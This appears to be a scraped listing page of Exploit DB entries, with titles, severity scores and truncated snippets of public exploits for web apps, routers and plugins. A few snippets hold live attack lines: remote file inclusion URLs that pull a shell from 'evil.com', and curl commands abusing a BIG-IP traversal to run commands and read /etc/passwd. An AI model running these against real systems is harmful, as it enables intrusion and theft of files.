Lucene search
K
ExploitdbMost viewed

47904 matches found

Exploit DB
Exploit DB
added 2020/07/09 12:0 a.m.246 views

Wordpress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting

Exploit Title: Wordpress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting Date: 2020-07-07 Vendor Homepage: https://powie.de Vendor Changelog: https://wordpress.org/plugins/powies-whois/developers Software Link: https://wordpress.org/plugins/powies-whois/ Exploit Author:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/01/08 12:0 a.m.246 views

ASTPP VoIP 4.0.1 - Remote Code Execution

Exploit Title: ASTPP VoIP 4.0.1 - Remote Code Execution Date: 2019-11-18 Exploit Author: Fabien AUNAY Vendor Homepage: https://www.astppbilling.org/ Software Link: https://github.com/iNextrix/ASTPP/tree/v4.0.1 Version: 4.0.1 vendor default setup script Tested on: Debian 9 - CentOS 7 CVE : - ASTPP...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/12/12 12:0 a.m.246 views

Bullwark Momentum Series JAWS 1.0 - Directory Traversal

Title: Bullwark Momentum Series JAWS 1.0 - Directory Traversal Date: 2019-12-11 Author: Numan Türle Vendor Homepage: http://www.bullwark.net/ Version : Bullwark Momentum Series Web Server JAWS/1.0 Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 POC --------- GET...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/11/12 12:0 a.m.246 views

eMerge50P 5000P 4.6.07 - Remote Code Execution

Exploit Title: eMerge50P 5000P 4.6.07 - Remote Code Execution Google Dork: NA Date: 2018-11-11 Exploit Author: LiquidWorm Vendor Homepage: http://linear-solutions.com/nscfamily/e3-series/ Software Link: http://linear-solutions.com/nscfamily/e3-series/ Version: 4.6.07 Tested on: NA CVE :...

10CVSS9.8AI score0.40005EPSS
Exploits7
Exploit DB
Exploit DB
added 2019/03/06 12:0 a.m.246 views

Android - getpidcon() Usage in Hardware binder ServiceManager Permits ACL Bypass

We already reported four bugs in Android that are caused by the use of getpidcon, which is fundamentally unsafe: https://bugs.chromium.org/p/project-zero/issues/detail?id=727 AndroidID-27111481; unexploitable https://bugs.chromium.org/p/project-zero/issues/detail?id=851 AndroidID-29431260;...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/02/22 12:0 a.m.246 views

WebKit JSC - reifyStaticProperty Needs to set the PropertyAttribute::CustomAccessor flag for CustomGetterSetter

/ https://github.com/WebKit/webkit/blob/3fff8c40c665a09de5e3ede46fc35908f69353c3/Source/JavaScriptCore/runtime/Lookup.hL392 if value.attributes & PropertyAttribute::PropertyCallback JSValue result = value.lazyPropertyCallbackvm, &thisObj; thisObj.putDirectvm, propertyName, result,...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2018/03/23 12:0 a.m.246 views

XenForo 2 - CSS Loader Denial of Service

Exploit Title: XenForo CSS Loader DoS Google Dork: intext:"Forum software by XenForo™" inurl:css.php ext:php Date: 22-03-18 Exploit Author: LockedByte Vendor Homepage: https://xenforo.com/ Software Link: https://xenforo.com/help/installation/ Version: XenForo 2 Tested on: Linux...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2009/12/24 12:0 a.m.246 views

Jax Guestbook 3.50 - Admin Login

Exploit Title: Jax Guestbook 3.50 Admin Login Exploit Date: December 23rd, 2009 Author: Sora Software Link: http://script.wareseeker.com/ASP-NET/jax-guestbook-3.50.zip/32956d53cf Version: 3.50 Tested on: Windows and Linux ------------------------------------------- Jax Guestbook 3.50 Admin Login...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2006/09/20 12:0 a.m.246 views

PHP Blue Dragon CMS 2.9.1 - Cross-Site Scripting / SQL Injection Code Execution

!/usr/bin/php -q -d shortopentag=on ? $devilteam = " ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+ +:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2006/09/04 12:0 a.m.246 views

FlashChat 4.5.7 - 'aedating4CMS.php' Remote File Inclusion

NeXtMaN Here are 3 RFI vulnerabilities in Flashchat i've found: Code: http://site.com/scriptpath/inc/cmses/aedating4CMS.php?dirinc=http://evil.com/shell.txt? http://site.com/scriptpath/inc/cmses/aedatingCMS2.php?dirinc=http://evil.com/shell.txt?...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2025/04/18 12:0 a.m.245 views

KiviCare Clinic & Patient Management System (EHR) 3.6.4 - Unauthenticated SQL Injection

Exploit Title: KiviCare Clinic & Patient Management System EHR 3.6.4 - Unauthenticated SQL Injection SQL Injection Google Dork: inurl:"/wp-content/plugins/kivicare-clinic-management-system/ Date: 11/12/2024 Exploit Author: Samet "samogod" Gözet Vendor Homepage: wordpress.org Software Link:...

7.5CVSS7.4AI score0.13515EPSS
Exploits2
Exploit DB
Exploit DB
added 2025/04/03 12:0 a.m.245 views

ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials

Exploit Title : ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: =3.07.01 Summary: ASPECT is an award-winning scalable building energy...

8.8CVSS8.9AI score0.01511EPSS
Exploits3
Exploit DB
Exploit DB
added 2023/07/11 12:0 a.m.245 views

Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)

Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting XSS Exploit Author: tmrswrr Vendor Homepage: https://decapcms.org/docs/intro/ Software Link: https://github.com/decaporg/decap-cms Version: 2.10.192 Tested on: https://cms-demo.netlify.com Description: 1. Go to new post and write...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/04/10 12:0 a.m.245 views

Paradox Security Systems IPR512 - Denial Of Service

!/bin/bash Exploit Title: Paradox Security Systems IPR512 - Denial Of Service Google Dork: intitle:"ipr512 - login screen" Date: 09-APR-2023 Exploit Author: Giorgi Dograshvili Vendor Homepage: Paradox - Headquarters https://www.paradox.com/Products/default.asp?PID=423 Version: IPR512 CVE :...

7.5CVSS7.6AI score0.44171EPSS
Exploits9
Exploit DB
Exploit DB
added 2023/04/05 12:0 a.m.245 views

Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)

// Exploit Title: Control Web Panel 7 CWP7 v0.9.8.1147 - Remote Code Execution RCE // Date: 2023-02-02 // Exploit Author: Mayank Deshmukh // Vendor Homepage: https://centos-webpanel.com/ // Affected Versions: version 0.9.8.1147 // Tested on: Kali Linux // CVE : CVE-2022-44877 // Github POC:...

9.8CVSS9.6AI score0.99995EPSS
Exploits12
Exploit DB
Exploit DB
added 2022/05/11 12:0 a.m.245 views

DLINK DAP-1620 A1 v1.01 - Directory Traversal

Exploit Title: DLINK DAP-1620 A1 v1.01 - Directory Traversal Date: 27/4/2022 Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: https://me.dlink.com/consumer Version: DAP-1620 - A1 v1.01 Tested on: Linux CVE : CVE-2021-46381 POST /apply.cgi HTTP/1.1 Content-Type:...

7.5CVSS7.6AI score0.57984EPSS
Exploits4
Exploit DB
Exploit DB
added 2021/06/14 12:0 a.m.245 views

Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated)

Exploit Title: Stock Management System 1.0 - 'userid' Blind SQL injection Authenticated Date: 11/06/2021 Exploit Author: Riadh Benlamine rbn0x00 Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/07/10 12:0 a.m.245 views

HelloWeb 2.0 - Arbitrary File Download

Exploit Title: HelloWeb 2.0 - Arbitrary File Download Date: 2020-07-09 Vendor Homepage: https://helloweb.co.kr/ Version: 2.0 Latest and previous versions Exploit Author: bRpsd Contact Author: cyatlive.no Google Dork: inurl:exec/file/download.asp Type: WebApps / ASP...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/06/30 12:0 a.m.245 views

Reside Property Management 3.0 - 'profile' SQL Injection

Exploit Title: Reside Property Management 3.0 - 'profile' SQL Injection Date: 2020-06-28 Google Dork: "Copyright 2020 Reside Property Management" Exploit Author: Ultra Security Team Ashkan Moghaddas , AmirMohammad Safari Team Members: Behzad Khalifeh , Milad Ranjbar Vendor Homepage:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/01/23 12:0 a.m.245 views

qdPM 9.1 - Remote Code Execution

Exploit Title: qdPM 9.1 - Remote Code Execution Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net Date: 2020-01-22 Exploit Author: Rishal Dwivedi Loginsoft Vendor Homepage: http://qdpm.net/ Software Link: http://qdpm.net/download-qdpm-free-project-management Version: =1.9.1 Tested on:...

8.8CVSS8.7AI score0.83235EPSS
Exploits16
Exploit DB
Exploit DB
added 2019/08/12 12:0 a.m.245 views

osTicket 1.12 - Persistent Cross-Site Scripting via File Upload

Exploit Title: osTicket-v1.12 Stored XSS via File Upload Vendor Homepage: https://osticket.com/ Software Link: https://osticket.com/download/ Exploit Author: Aishwarya Iyer Contact: https://twitter.com/aish9524 Website: https://about.me/aishiyer Category: webapps CVE: CVE-2019-14748 1. Descriptio...

5.4CVSS6.2AI score0.02733EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/03/20 12:0 a.m.245 views

Netartmedia PHP Real Estate Agency 4.0 - SQL Injection

Exploit Title: Netartmedia PHP Real Estate Agency 4.0 - SQL Injection Date: 19.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/propertyagency/ Demo Site: https://www.phpscriptdemos.com/agency/ Version: 4.0 Tested on: Kali Linux CVE: N/A Description:PHP Real...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/01/24 12:0 a.m.245 views

Mozilla Firefox < 50.0.2 - 'nsSMILTimeContainer::NotifyTimeChange()' Remote Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "Firefox nsSMILTimeContainer::NotifyTimeChange RCE", 'Description' = %q This module exploits an out-of-bounds...

7.5CVSS8.8AI score0.87598EPSS
Exploits13
Exploit DB
Exploit DB
added 2015/08/25 12:0 a.m.245 views

vBulletin 3.6.0 < 4.2.3 - 'ForumRunner' SQL Injection

Exploit Title : vBulletin = 4.2.3 SQL Injection CVE-2016-6195 Author : Manish Kishan Tanwar AKA error1046 https://twitter.com/IndiShell1046 Date : 25/08/2015 Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi Tested At : Indishell Laboriginally develop...

9.8CVSS9.6AI score0.68493EPSS
Exploits7
Exploit DB
Exploit DB
added 2010/05/09 12:0 a.m.245 views

HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Buffer Overflow (Metasploit)

$Id: hpnnmtoolbar.rb 9262 2010-05-09 17:45:00Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/...

10CVSS7AI score0.63419EPSS
Exploits19
Exploit DB
Exploit DB
added 2025/04/14 12:0 a.m.244 views

OpenPanel 0.3.4 - Directory Traversal

Exploit Title: OpenPanel 0.3.4 - Directory Traversal Date: Dec 05, 2024 Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee Vendor Homepage: https://openpanel.com/ Software Link: https://openpanel.com/ Version: 0.3.4 Tested on: macOS CVE : CVE-2024-53537 Compress Function POS...

9.1CVSS7.1AI score0.02279EPSS
Exploits3
Exploit DB
Exploit DB
added 2025/03/21 12:0 a.m.244 views

Jasmin Ransomware - SQL Injection Login Bypass

Exploit Title: Jasmin Ransomware SQL Injection Login Bypass Google Dork: N/A Date: 05-03-2025 Exploit Author: Buğra Enis Dönmez Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware Software Link: https://github.com/codesiddhant/Jasmin-Ransomware Version: N/A Tested on: Windows How t...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/04/06 12:0 a.m.244 views

Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI

Exploit Title: Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI Date: 2022-10-14 Fix Date: 2020-05 Exploit Author: Kahvi-0 Github: https://github.com/Kahvi-0 Vendor Homepage: https://www.mitel.com/ Vendor Security Advisory:...

5.3CVSS5.3AI score0.45241EPSS
Exploits3
Exploit DB
Exploit DB
added 2023/03/28 12:0 a.m.244 views

Moodle LMS 4.0 - Cross-Site Scripting (XSS)

Exploit Title: Moodle LMS 4.0 - Cross-Site Scripting XSS Date: 26/10/2022 Exploit Author: Saud Alenazi Vendor Homepage: https://moodle.org/ Software Link: https://git.in.moodle.com/moodle Version: 4.0 Tested on: XAMPP, Windows 10 Contact: https://twitter.com/dmaral3noz Description: A Cross Site...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/03/25 12:0 a.m.244 views

Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection

Exploit Title: Translatepress Multilinugal WordPress plugin 2.3.3 - Authenticated SQL Injection Exploit Author: Elias Hohl Date: 2022-07-23 Vendor Homepage: https://translatepress.com/ Software Link: https://wordpress.org/plugins/translatepress-multilingual/ Version: 2.3.3 Tested on: Ubuntu 20.04...

8.8CVSS8.8AI score0.03851EPSS
Exploits5
Exploit DB
Exploit DB
added 2022/02/09 12:0 a.m.244 views

AtomCMS v2.0 - SQLi

Exploit Title: AtomCMS v2.0 - SQLi Date: 08/02/2022 Exploit Author: Luca Cuzzolin aka czz78 Vendor Homepage: https://github.com/thedigicraft/Atom.CMS Version: v2.0 Category: Webapps Tested on: Debian linux CVE : CVE-2022-24223 ==================================================== PoC : SQLi :...

9.8CVSS9.8AI score0.61965EPSS
Exploits4
Exploit DB
Exploit DB
added 2022/02/02 12:0 a.m.244 views

CONTPAQi(R) AdminPAQ 14.0.0 - Unquoted Service Path

Exploit Title: CONTPAQi® AdminPAQ 14.0.0 - Unquoted Service Path Discovery by: Angel Canseco Discovery Date: 2022-01-16 Software Link: https://www.contpaqi.com/descargas Tested Version: 14.0.0 Vulnerability Type: Unquoted Service Path Tested on OS: Windows 10 pro x64 english Step to discover...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/09/30 12:0 a.m.244 views

Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation

Exploit Title: Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation Google Dork: inurl:/wp-content/plugins/js-jobs/ Date: 22/09/2021 Exploit Author: spacehen Vendor Homepage: https://wordpress.org/plugins/js-jobs/ Version: spacehen www.github.com/spacehen" def...

0.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/09/22 12:0 a.m.244 views

Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: Filerun 2021.03.26 - Remote Code Execution RCE Authenticated Date: 09/21/2021 Exploit Author: syntegris information solutions GmbH Credits: Christian P. Vendor Homepage: https://filerun.com Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/07/27 12:0 a.m.244 views

Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass

Exploit Title: Customer Relationship Management System CRM 1.0 - Sql Injection Authentication Bypass Date: 27/07/2021 Exploit Author: ShafiqueWasta Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/05/13 12:0 a.m.244 views

Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass (SQLi)

Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass SQLi Date: 12.05.2021 Exploit Author: Mesut Cetin Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/03/23 12:0 a.m.244 views

ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path

Exploit Title: ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path Exploit Author : SamAlucard Exploit Date: 2021-03-21 Software Version : ActivIdentity 8.2 Vendor Homepage : https://www.hidglobal.com/ Tested on OS: Windows 7 Pro ActivIdentity was Acquired by HID Global in Octuber 2010...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/02/08 12:0 a.m.244 views

WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion

Exploit Title: WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion Date: 24/07/2020 Exploit Author: Erik David Martin Vendor Homepage: https://supsystic.com/ Software Link: https://downloads.wordpress.org/plugin/backup-by-supsystic.zip Version: 2.3.9 Tested on: Ubuntu 16.04.6 LTS /...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/12/22 12:0 a.m.244 views

10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)

Exploit Title: 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow SEH Date: 2020-12-22 Exploit Author: Florian Gassner Vendor Homepage: https://www.10-strike.com/ Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe Version: 9.05 Tested on...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/07/26 12:0 a.m.244 views

WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download

Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt Date: 2020-07-20 Exploit Author: KBA@SOGETIESEC Vendor Homepage: https://www.icegram.com/email-subscribers/ Softwar...

5.8CVSS5.5AI score0.71399EPSS
Exploits4
Exploit DB
Exploit DB
added 2020/07/05 12:0 a.m.244 views

BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution (PoC)

RCE: curl -v -k 'https://F5 Host/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' Read File: curl -v -k 'https://F5 Host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'...

9.9AI score
Exploits0
Exploit DB
Exploit DB
added 2019/11/14 12:0 a.m.244 views

oXygen XML Editor 21.1.1 - XML External Entity Injection

Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection Author: Pablo Santiago Date: 2019-11-13 Vendor Homepage: https://www.oxygenxml.com/ Source:https://www.oxygenxml.com/xmleditor/downloadoxygenxmleditor.html Version: 21.1.1 CVE : N/A Tested on: Windows 7 PoC 1- python -m...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2019/08/19 12:0 a.m.244 views

Neo Billing 3.5 - Persistent Cross-Site Scripting

Exploit Title: Neo Billing 3.5 - Stored Cross Site Scripting Vulnerability Date: 18.8.2019. Exploit Author: n1x MS-WEB Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547 Version: 3.5 CWE : CWE-79 CVE: CVE-2020-23518 Description Neo Billing os a...

5.4CVSS5.8AI score0.02001EPSS
Exploits2
Exploit DB
Exploit DB
added 2019/03/13 12:0 a.m.244 views

elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'elFinder PHP Connector exiftran Command Injection', 'Description' = %q This module exploits a command injection vulnerability in elFinder version...

9.8CVSS9.5AI score0.96633EPSS
Exploits11
Exploit DB
Exploit DB
added 2018/03/27 12:0 a.m.244 views

TestLink Open Source Test Management < 1.9.16 - Remote Code Execution (PoC)

TestLink Open Source Test Management 1.9.16 - Remote Code Execution PoC. CVE-2018-7466. Remote exploit for Linux platform Title: TestLink Open Source Test Management= 1.9.16 Remote Code Execution By Manish error1046 Vendor Home Page: http://testlink.org Disovered At: Indishell Lab CVE ID:...

7.5CVSS7.8AI score0.06238EPSS
Exploits9
Exploit DB
Exploit DB
added 2004/04/19 12:0 a.m.244 views

phpBB 2.0.x - &#039;album_portal.php&#039; Remote File Inclusion

source: https://www.securityfocus.com/bid/10177/info It has been reported that phpBB may be prone to a file include vulnerability that may allow remote attackers to include a remote malicious script to be executed on a vulnerable system...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2025/08/11 12:0 a.m.243 views

Belkin F9K1009 F9K1010 2.00.04/2.00.09 - Hard Coded Credentials

/ Title : Belkin F9K1009 F9K1010 2.00.04/2.00.09 - Hard Coded Credentials Author : Byte Reaper CVE : CVE-2025-8730 Description : Exploit demonstrating an authentication bypass vulnerability in the web interface of Belkin F9K1009 and F9K1010 routers. The flaw resides in improper session validation...

10CVSS7.4AI score0.03245EPSS
Exploits2
Exploit DB
Exploit DB
added 2025/04/15 12:0 a.m.243 views

OpenCMS 17.0 - Stored Cross Site Scripting (XSS)

Exploit Title: OpenCMS 17.0 - Stored Cross Site Scripting XSS Date: 24-11-2024 Exploit Author: Siddhartha Naik Vendor Homepage: http://www.opencms.org/en/ Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=dade528f-ec17-11ee-ab97-7fde8b0295e1 Affected Version: 17.0...

5.4CVSS7.4AI score0.00228EPSS
Exploits3
Exploit DB
Exploit DB
added 2025/04/11 12:0 a.m.243 views

qBittorrent 5.0.1 - MITM RCE

Exploit Title: qBittorrent 5.0.1 MITM RCE Date: 01/02/2025 Exploit Author: Jordan Sharp Vendor Homepage: https://github.com/qbittorrent/qBittorrent Software Link: https://www.qbittorrent.org/download Version: 5.0.1 Tested on: Windows 10 CVE : CVE-2024-51774 Run the PoC on a MITM machine...

8.1CVSS7AI score0.03295EPSS
Exploits2
Exploit DB
Exploit DB
added 2025/03/28 12:0 a.m.243 views

Sonatype Nexus Repository 3.53.0-01 - Path Traversal

Exploit Title: Sonatype Nexus Repository 3.53.0-01 - Path Traversal Google Dork: header="Server: Nexus/3.53.0-01 OSS" Date: 2024-09-22 Exploit Author: VeryLazyTech GitHub: https://github.com/verylazytech/CVE-2024-4956 Vendor Homepage: https://www.sonatype.com/nexus-repository Software Link:...

7.5CVSS7.7AI score0.18245EPSS
Exploits16
Total number of security vulnerabilities5000